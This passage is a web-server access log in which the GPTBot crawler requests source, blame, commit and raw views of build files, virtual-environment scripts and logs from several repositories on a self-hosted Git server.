+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 23210] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 22191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10942] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10943] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27658] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27627] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27656] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11578] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:15:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11765] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:15:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13517] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:15:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fstatus.json" [Client 74.7.227.38] [Length 19738] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:15:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27661] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 12505] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:15:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11067] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10593] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:15:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:15:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:15:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:15:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:15:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 10846] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:15:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13253] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9927] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:15:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" [Client 74.7.227.38] [Length 2731] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/warn-PostgresPatrol.txt" -[17/Feb/2026:15:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22079] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:15:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12154] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11521] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11058] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19882] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr 